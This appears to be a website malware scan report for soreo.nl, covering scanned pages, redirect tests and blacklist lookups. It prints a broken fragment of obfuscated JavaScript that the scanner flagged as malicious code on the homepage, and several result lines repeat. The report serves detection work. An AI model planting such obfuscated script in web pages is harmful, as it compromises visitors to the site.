Scanned pages/files
Request | Server response | Status |
http://www.soreo.nl/ | 200 OK Content-Length: 14341 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H Antivirus reports:
| ||
http://www.soreo.nl/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: soreo.nl
Result:
GET / HTTP/1.1
Host: soreo.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: soreo.nl
Referer: http://www.google.com/search?q=soreo.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: soreo.nl
Referer: http://www.google.com/search?q=soreo.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=soreo.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://soreo.nl/
Result: soreo.nl is not infected or malware details are not published yet.
Result: soreo.nl is not infected or malware details are not published yet.